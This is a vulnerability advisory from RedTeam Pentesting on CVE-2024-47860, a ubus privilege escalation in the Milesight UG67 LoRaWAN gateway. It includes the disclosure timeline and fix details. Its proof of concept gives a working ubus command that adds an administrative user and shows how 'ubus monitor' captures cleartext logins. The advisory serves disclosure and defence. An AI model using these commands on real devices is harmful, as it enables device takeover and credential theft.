Milesight UG67: UBUS Allows for Privilege Escalation

Attackers who which can execute commands on a Milesight UG67 LoRaWAN Gateway can gain full root access by using ubus features.

Details

• Product: Milesight UG67 Outdoor LoRaWAN Gateway
• Affected Versions: 60.0.0.42-r5, likely others
• Fixed Versions: 60.0.0.44
• Vulnerability Type: Local Privilege Escalation
• Security Risk: low
• Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
• Vendor Status: fixed version released
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-004
• Advisory Status: published
• CVE: CVE-2024-47860
• CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47860

Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.

More Details

Attackers who are able to execute commands with the privileges of any user account on a Milesight UG67 LoRaWAN Gateway can use the ubus inter-process-communication system to read ubus messages of other processes and call ubus functions. This allows for example to create new users with administrative privileges or to obtain cleartext credentials of other users, including administrative accounts, who authenticate to the device.

Proof of Concept

Any user account with the ability to execute arbitrary commands on the gateway (see rt-sa-2024-2024-003 on how to gain command execution via PostgreSQL) is able to use the ubus command-line client to issue commands. In the following, a user redteam will be created via ubus call:

$ ubus call yruo_usermanagement add \
"{ \
    'base': 'user_list', \
    'index': 'user_listlvf0lwqg', \
    'value': { \
        'username': 'redteam', \
        'old_username': 'username', \
        'password': 'secretpassword', \
        'permission': '1' \
    }, \
    'type': 'user_list', \
    'ysusername': 'admin', \
    'ysrole': 4 \
}"

Afterwards it is possible to log in into the web interface with almost full access. This allows to read and change all configured values, including all secrets.

To monitor traffic received by the ubusd server, the ubus monitor command can be used:

$ ubus monitor

This includes the messages generated when a user authenticates to the system via the web interface:

-> bd896693 #00000000  status: {"status":0}
[...]
<- bd896693 #9a5c2c32  invoke: {"objid": -1705235406, "method": "login",
                                "data": {"username": "admin",
                                         "password": "xxxxxxxxxxxxxxxxxxxxxx",
                                         "ubus_rpc_session": "000000[...]00",
                                         "timeout": 1800, "ip": "127.0.0.1"}}

Since the login details are provided by ubus in the clear, this allows attackers to collect the credentials of all users who authenticate to the gateway while the ubus traffic is monitored.

Workaround and Fix

The ubus ACL should be modified to restrict access to ubus by low-privileged users accounts by default.

Security Risk

Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway, can collect valid user credentials by monitoring ubus traffic or create new users with administrative privileges. This allows attackers to completely take over the device and extract all configured secrets.

Since all accounts, except the root account, only have a limited shell configured, which does not allow to execute arbitrary commands, this attack requires another vulnerability (like rt-sa-2024-003) to gain shell access. In combination these vulnerabilities pose a high risk.

Timeline

• 2024-04-25 Vulnerability identified
• 2024-04-29 Customer approved disclosure to vendor
• 2024-05-14 Vendor notified
• 2024-06-28 asked Vendor for update
• 2024-07-03 Vendor will provide Update until end of July
• 2024-07-24 asked Vendor for update
• 2024-07-30 Vendor stated: Work in Progress
• 2024-08-09 Vendor stated: Fix expected Q3/24
• 2024-09-24 CVE ID requested
• 2024-09-24 asked Vendor for update
• 2024-09-24 Vendor stated: Fix in 60.0.0.44
• 2024-10-04 CVE ID assigned
• 2024-10-07 asked Vendor for update
• 2024-10-08 Vendor stated: Fix will be available mid-October
• 2024-10-18 asked Vendor for update
• 2024-10-21 Vendor stated: Fix will be available mid-November
• 2024-11-04 Vendor released fixed version for testing
• 2024-11-05 Vendor released fixed version
• 2024-12-10 Customer approved public release of vulnerabiltiy details
• 2024-12-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/